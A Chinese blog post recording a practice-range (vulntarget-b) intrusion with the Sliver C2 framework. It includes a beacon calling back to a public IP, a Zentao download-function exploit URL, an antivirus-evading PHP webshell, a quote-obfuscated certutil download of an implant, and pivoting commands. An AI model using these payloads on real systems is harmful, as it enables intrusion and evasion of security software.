vulntarget-b记录(Sliver学习)

最新推荐文章于 2024-09-12 20:56:31 发布
最新推荐文章于 2024-09-12 20:56:31 发布
阅读量926 收藏 7
点赞数 25
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63028223/article/details/139412869
版权

网络环境

域控(Win2016)

vulntarget\administrator:Admin@123、(首次登陆要改密码修改为Admin@123@)

vulntarget\win101:admin#123

边界Web主机突破

nmap扫描发现81端口

通过扫描,fuzz出来了后台地址

具体的WEB突破手段参考一下师傅的文章:

vulntarget-b靶场详细通关记录_vulntarget -b-CSDN博客

使用sliver,生产一个马子

[server] sliver > generate  beacon --mtls 106.54.61.66:3308 --os linux

[*] Generating new linux/amd64 beacon implant binary (1m0s)
[*] Symbol obfuscation is enabled
[*] Build completed in 50s
[*] Implant saved to /home/ubuntu/SURVIVING_ILLEGAL

[server] sliver >

通过蚁剑去运行马子上线,

[server] sliver > mtls -l 3308  #监听端口

[*] Starting mTLS listener ...

[*] Successfully started job #2

[*] Beacon 0d8be3d0 SURVIVING_ILLEGAL - 192.168.1.104:9442 (localhost.localdomain) - linux/amd64 - Mon, 03 Jun 2024 14:31:26 CST

[server] sliver >

发现双网卡

通过传上去一个fscan,扫描结果如下

发现

[+] InfoScan http://10.0.20.66:8080    [禅道] 
这里尝试了 re ,毒刺,ew 都不太行(应该是我操作姿势不对)后来发现通过iox代理工具可以获取到一个稳定的流量转发隧道。

工具链接 : GitHub - EddieIvan01/iox: Tool for port forwarding & intranet proxy

/.iox proxy -l 1080

配置浏览器代理 下图的192.168.1.104 是边界靶机IP,上边的命令也是在边界靶机中运行

成功访问到:http://10.0.20.66:8080  

通过测试发现 同样存在弱口令 admin Admin123

信息收集发现存在CNVD-C-2020-121325漏洞

可用poc:

http:// [目标地址] /www/index.php?m=client&f=download&version=[$version参数]&link=[ base64加密后的恶意文件地址]

HTTP://10.0.20.30:8000/1.php  #因为发现边界服务器存在python2 所以我直接将webshell传入到边界服务器,利用python2开启web服务


最终payload:
http://10.0.20.66:8080/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6ODAwMC8xLnBocA==

这里需要注意,因为 10.0.20.66 上存在火绒,一句话木马啥的会被直接杀,所以需要构造一个免杀的webshll,我这里使用的webshell如下:

<?php
 $Xfp_3 = create_function('', $_REQUEST["\141"]); $Xfp_3();//密码a

蚁剑挂一个代理:

这里继续使用sliver

socks5 start #开启代理
pivots tcp --bind 10.0.20.30     
pivots
generate --tcp-pivot 10.0.20.30:9898 --os win

把这个马子传入web服务靶机上,开启http服务,使用刚才植入的webshell利用蚁剑下载这个马子

这里直接下载会被火绒拦截

绕过一下,姿势如下:

certutil  -""u""r""l""c""a""c""h""e"" -split -f http://10.0.20.30:8000/RUDE_DIVER.exe www.exe

拿到主机权限

 发现 10.0.10.99/24 网段,而且发现处于域环境。

得到域控IP 10.0.10.100

继续上iox挂二层代理

centos

centos(web服务边界主机):./iox proxy -l 2258 -l 1080
win10(内网域主机)      : iox.exe proxy -r 10.0.20.30:2258

随后在代理共添加
192.168.1.104 1080

代理没问题。

之后....................域控没打下来

一个番茄锅
关注
  • 25
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
红蓝对抗--sliver 搭建
问题很多的小明
12-04 1925
sliver C2搭建与安装过程
2020 USACO OPEN--Sliver
灰色的人的博客
04-13 787
T1 题目描述 由于高传染性的牛传染病 COWVID-19 的爆发,Farmer John 非常担忧他的奶牛们的健康。 为了限制疾病的传播,Farmer John 的 N 头奶牛(2≤N≤10^5)(2≤N≤10 5 )决定践行“社交距离”,分散到农场的各处。农场的形状如一维数轴,上有 M 个互不相交的区间(1≤M≤10^5)(1≤M≤10 5 ),其中有可用来放牧的青草。奶牛们想要使她们位于不同...
Flutter---Sliver集合
a875801的博客
06-12 5956
import 'package:flutter/material.dart'; import 'dart:math' as math; void main() => runApp(MyApp()); class MyApp extends StatelessWidget { // This widget is the root of your application. @over...
强化学习之父--David Sliver最新演讲内容!
深度学习技术前沿
04-16 196
关注上方“深度学习技术前沿”,选择“星标公众号”,资源干货,第一时间送达!本文主要是分享强化学习之父-David Sliver在2020年的最新演讲视频,讲解内容涉及:AlphaGo, ...
TM 学习记录--论文阅读1
monkeynight的博客
09-28 953
由于作者book只更新到第二章剩下的只有从论文中学习,但书中的目录和论文可以由于对应起来。第一二章可以对应到第一篇论文,
学习笔记-sliver
人饭子的博客
11-03 325
sliver 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 项目地址 https://github.com/BishopFox/sliver 使用文档 https://github.com/BishopFox/sliver/wiki 相关文章 sliver c2代码的学习 安装 官方一条命令版 # 安装 curl...
Flutter笔记--Sliver用法
ljt2724960661的博客
02-04 1368
这一节主要复习Sliver
sliver
5L2g556F5ZWl77yf
11-03 1020
sliver c2支持mtls、WireGuard、http/https、dns、namedpipe、tcp等协议的上线。server默认会监听一个端口31337,可以修改掉~/.sliver/configs/server.json。下载对应客户端,导入server生成的配置文件,连接。弹回会话有ip,端口,主机名,系统架构,时间信息。关闭defender后使用360没有检测出威胁。使用session查看所有会话信息。defender直接删了。migrate 迁移进程。getsystem 提权。
TM book学习记录--第一章
monkeynight的博客
09-26 289
记录一下学习TM的过程,主要是对书本的学习
桌面宠物 - 小花猫 Sliver Cat @Copyright(C)1999
01-21
《桌面宠物 - 小花猫 Sliver Cat @Copyright(C)1999》是一款经典的人工智能桌面应用,它在1999年由其开发者发布,旨在为用户提供一个互动、娱乐的桌面伴侣。Sliver Cat是一款模拟真实猫咪行为的虚拟宠物,通过在用户...
sliver-py:Sliver gRPC客户端库
04-10
SliverPy ... expanduser ( "~" ), ".sliver-client" , "configs" ) DEFAULT_CONFIG = os . path . join ( CONFIG_DIR , "default.cfg" ) def main (): ''' Client example ''' config = SliverClientCo
TE Connectivity推出符合SFF-TA-1002规范的Sliver卡缘连接器
01-20
Sliver SFF-TA-1002连接器支持PCIe Gen 5, 可扩展至112G PAM-4。该连接器采用0.6mm间距的高密度设计,可满足下一代硅技术下,PCIe标准的通道数要求,而市场上现有产品已达其通道数极限。  TE Connectivity的产品...
Flutte进阶篇-Sliver演练实例
06-08
Flutte进阶篇-Sliver演练实例
AI在医学领域:医学AI的安全与隐私全面概述
最新发布
声纹感知 洞察芯声
09-12 668
本文通过系统化地检查医疗应用领域并为未来的攻击研究奠定基础,提供一个医疗领域AI攻击研究的全面视角。
浅谈网络安全的认识与学习规划
qq_201729558
09-05 1079
本文主要介绍网络安全认识与学习规划
快速失败 (fail-fast) 和安全失败 (fail-safe)
Flying_Fish_roe的博客
09-07 890
快速失败是一种系统设计原则,当系统遇到异常情况或错误时,立即停止执行并返回错误,而不是试图继续执行或处理潜在的问题。快速失败系统会主动检测系统中的问题,并尽早报告错误,以防止错误进一步传播或导致更大的问题。在快速失败系统中,当检测到某些异常条件或不一致时,系统立即抛出异常或错误,停止当前操作并通知用户或开发者。这种机制通常用于防止错误堆积,使得系统可以快速恢复到正常状态,并尽早解决问题。快速失败的核心思想是“及早报告、及早修复”。通过尽早暴露错误,开发者能够更容易地定位问题,减少问题在系统中的蔓延。
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 691
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
伙房食堂电气安全新挑战:油烟潮湿环境下,如何筑起电气火灾“防火墙”?
acrel002的博客
09-12 195
安科瑞的智能安全配电装置打破了传统用电防护领域中仅仅只能做到“事后处理”的技术瓶颈,提前将配电转换安全电,从源头抑制电弧火花的产生,大大降低火灾风险,同时系统实时监测电气线路中电压、电流、功率、温度、剩余(漏)电流、对地绝缘阻值等关键数据,智能识别电路异常风险,及时将报警信息传送至云管理系统,提醒用户单位及时进行故障排查。近几年,随着我国经济的飞速发展,食堂餐饮也经历了一场变革,越来越多的电器走进了伙房食堂中,实现了电气化,为人们提供了高效便利的饮食服务,但同时也增加了火灾负荷。
sliver4.2.2
07-27
Sliver是一种用于构建滚动效果的Widget。在Flutter中,滚动效果可以通过将子Widget包裹在一个滚动容器中来实现,而Sliver正是用来创建这样的滚动容器的。 Sliver4.2.2是Sliver的一个特定版本或常用的配置。具体来说,这个版本可能会包含了一些特定的修复或更新,通过使用这个版本,可以确保在滚动过程中的性能和用户体验得到最佳的保证。 在Sliver中,可以根据需要选择不同的配置,以满足不同的滚动需求。例如,SliverAppBar可以创建一个可以随着滚动而收缩的应用栏,SliverGrid可以创建一个可以滚动的网格布局,SliverList可以创建一个可以滚动的列表等等。 Sliver的工作原理是,它会根据滚动的位置动态生成和回收子Widget,以提高性能和减少内存消耗。滚动容器会根据屏幕大小和滚动位置自动调整子Widget的显示范围,只显示在屏幕内可见的部分,而不需要一次性加载所有的子Widget。 在使用Sliver时,需要注意一些常见的问题。例如,滚动容器的内容不要过于庞大,以免消耗过多的内存和CPU资源。另外,对于需要处理用户手势的滚动效果,应该正确处理滑动事件,以提供良好的用户体验。 总之,Sliver4.2.2是一个用于构建滚动效果的Widget版本,在Flutter中使用Sliver可以轻松创建各种类型的滚动容器,并且可以根据具体的需求进行自定义配置,以满足不同的滚动需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值